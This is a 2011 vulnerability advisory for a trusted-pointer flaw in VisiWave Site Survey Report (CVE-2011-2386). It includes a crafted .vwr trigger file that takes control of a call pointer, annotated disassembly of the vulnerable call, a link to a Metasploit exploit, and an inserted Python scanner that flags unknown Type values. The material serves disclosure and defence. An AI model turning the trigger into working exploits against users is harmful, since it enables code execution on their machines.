VisiWave Site Survey Report Trusted Pointer (SS-2011-005)

  • Title: VisiWave Site Survey Report Trusted Pointer
  • Version: 1.0
  • Issue type: Trusted pointer
  • Affected vendor: VisiWave
  • Release date: 25/05/2011
  • Discovered by: Steven Seeley
  • Issue status: Patch available

Summary

stratsec has identified a trusted pointer vulnerability within the VisiWave Site Survey Reporting tool. The vulnerability can be triggered by opening a specially crafted report file. It can lead to remote code execution if a user is socially engineered into opening a malicious report file. Failed attempts will likely lead to a denial of service condition.
 

Description

VisiWave Site Survey Report allows you to interactively visualize the survey data as well as create a detailed, permanent record of the site survey.
 
The interactive analysis tool allows you to quickly visualize the large sampling of data that was collected using the data collection application. The data can be viewed in tabular form, as a 3D contour surface, as a 2D isotropic contour plot, as well as many other effective visualisation techniques.
 
During installation, the application registers two file types (vws and vwr) with the Windows file type extension list. Once this is complete, both file types open natively in the VisiWave applications: a user can simply double-click a vwr file and the VisiWave Site Survey Report application will process it.
 

Impact

A remote attacker could socially engineer a user into double-clicking a malicious vwr file, which would likely result in remote code execution with the privileges of the currently logged-in user.
 
Additionally, the user could simply open the malicious vwr file from the file dialog box contained within the VisiWave Site Survey Report application and trigger the vulnerability.
 

Affected products

  • VisiWave version 2.1.8
  • Previous versions are likely affected

Technical Details

When processing vwr files, VisiWaveReport.exe attempts to match a valid pointer based on the ‘type’ property. Valid type properties include ‘Properties’, ‘TitlePage’, ‘Details’, ‘Graph’, ‘Table’, ‘Text’ and ‘Image’. If no match is found during processing, the function that handles the ‘type’ property still treats the value as a valid pointer and performs an indirect call through it. By specifying an arbitrary value for the ‘type’ property within a vwr file, it is possible to trigger code execution.

Below is an example of a vwr trigger that sets the pointer to 0x42424242 in EDX:
 
FileType: SSREPORT
Product: VisiWave Site Survey, 1.6.5 Beta
FileVersion: 10
Item: Global Properties
Checked: 1
Type: BBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SurveyFile: C:\Program Files\VisiWave Site Survey\Samples\SampleData.vws
FloorPlanImageReport: C:\Program Files\VisiWave Site Survey\Samples\SampleFloorplan.gif
DefaultOrientation: 0
Header: 
Footer: @PAGE of @PAGES
LeftMargin: 100
RightMargin: 100
TopMargin: 50
BottomMargin: 50
Item: Kalamazoo College Upjohn Library
Checked: 1
 
The trigger file will reach the following vulnerable code in VisiWaveReport.exe:
  
0041BADD 8B16 MOV EDX, DWORD PTR DS:[ESI] ; load the attacker-controlled value (0x42424242) into EDX
0041BADF 8D4424 38 LEA EAX, DWORD PTR SS:[ESP+38]
0041BAE3 50 PUSH EAX
0041BAE4 57 PUSH EDI
0041BAE5 8BCE MOV ECX,ESI
0041BAE7 FF52 10 CALL DWORD PTR DS:[EDX+10] ; indirect call through the attacker-controlled pointer at EDX+0x10
 
At crash time, there are many application-specific pointers that an attacker can control. One of these pointers could be used to dereference and redirect the execution path from the EDX register.
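The following script is an added example and is not code from the advisory, from stratsec or from VisiWave. It is a triage check a defender can run over .vwr report files before they are opened: it parses the line-oriented "Key: Value" layout shown in the trigger above and flags any Type value outside the set the advisory names as valid, tying each finding back to the Item it belongs to. The property names and layout come from the page; the sample file contents, the BAD_TYPE pattern and the function names are constructed here for illustration.

```python
"""Triage check for VisiWave .vwr report files.

Added example for this advisory (not VisiWave's or stratsec's code). The
'Key: Value' line layout and the Item/Type property names are taken from the
trigger file shown in the advisory; the allowlist is the set of Type values the
advisory names as valid. Everything else is an assumption made for illustration.
"""
from typing import List, Tuple

# Type values the advisory names as valid. VisiWaveReport.exe treated any
# other value as if the lookup had succeeded, which is the bug.
KNOWN_TYPES = frozenset(
    {"Properties", "TitlePage", "Details", "Graph", "Table", "Text", "Image"}
)


def parse_vwr(text: str) -> List[Tuple[str, str]]:
    """Split the line-oriented 'Key: Value' format into (key, value) pairs.

    Values may themselves contain ':' (e.g. 'C:\\...'), so split on the first
    colon only. Lines without a colon are kept with an empty key, not dropped.
    """
    pairs: List[Tuple[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        pairs.append((key.strip(), value.strip()) if sep else ("", line))
    return pairs


def find_unknown_types(text: str) -> List[Tuple[str, str]]:
    """Return (item name, Type value) for every Type outside the allowlist.

    The item name is the most recent 'Item:' line, so each finding can be tied
    back to the report section that carries it.
    """
    findings: List[Tuple[str, str]] = []
    item = "<no item>"
    for key, value in parse_vwr(text):
        if key.lower() == "item":
            item = value
        elif key.lower() == "type" and value not in KNOWN_TYPES:
            findings.append((item, value))
    return findings


def is_ssreport(text: str) -> bool:
    """True when the file opens with the SSREPORT header the format starts with."""
    pairs = parse_vwr(text)
    return bool(pairs) and pairs[0] == ("FileType", "SSREPORT")


# Constructed samples: a benign report fragment, and one modelled on the
# advisory's trigger (an oversized Type value that is not in the allowlist).
BENIGN_VWR = """FileType: SSREPORT
Product: VisiWave Site Survey, 1.6.5 Beta
FileVersion: 10
Item: Global Properties
Checked: 1
Type: Properties
SurveyFile: C:\\Program Files\\VisiWave Site Survey\\Samples\\SampleData.vws
Item: Cover
Checked: 1
Type: TitlePage
"""

BAD_TYPE = "BBBB" + "A" * 47  # constructed, shaped like the trigger's Type value
TRIGGER_VWR = BENIGN_VWR.replace("Type: Properties", "Type: " + BAD_TYPE)


def scan(text: str) -> str:
    """Human-readable verdict for one file's contents."""
    if not is_ssreport(text):
        return "not an SSREPORT file"
    bad = find_unknown_types(text)
    if not bad:
        return "clean: all Type values are in the allowlist"
    detail = "; ".join(f"item {i!r} has Type {t[:16]!r}..." for i, t in bad)
    return "suspicious: " + detail


if __name__ == "__main__":
    import sys

    if sys.argv[1:]:
        for path in sys.argv[1:]:
            # The format is plain text; latin-1 with replacement never raises.
            with open(path, "r", encoding="latin-1", errors="replace") as fh:
                print(path, "->", scan(fh.read()))
    else:
        print("benign  ->", scan(BENIGN_VWR))
        print("trigger ->", scan(TRIGGER_VWR))
```

Run it with one or more .vwr paths to get a verdict per file, or with no arguments to see it classify the two embedded samples. The allowlist check is the same decision the patched application has to make: an unknown Type is rejected rather than dispatched through.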
 

Proof of concept

A proof of concept exploit has been developed by Steven Seeley and Rocco Calvi for the Metasploit framework. In its current state, the exploit bypasses ASLR and DEP and works on Windows 7.
 
The code can be found in Metasploit’s repository:
  • http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/fileformat/visiwave_vwr_type.rb

Solution

Update to version 2.1.9.
 

Response timeline

  • 04/05/2011 - Vendor notified.
  • 05/05/2011 - Vendor acknowledges receipt of advisory.
  • 05/05/2011 - Vendor confirms issue presence.
  • 05/05/2011 - Fix release date agreed as 19/05/2011.
  • 20/05/2011 - Vendor releases updated version.
  • 23/05/2011 - stratsec confirms update resolves issue.
  • 25/05/2011 - Advisory published.

References

  • Vendor advisory: http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html
  • OSVDB item: http://osvdb.org/show/osvdb/72464
  • CVE reference: CVE-2011-2386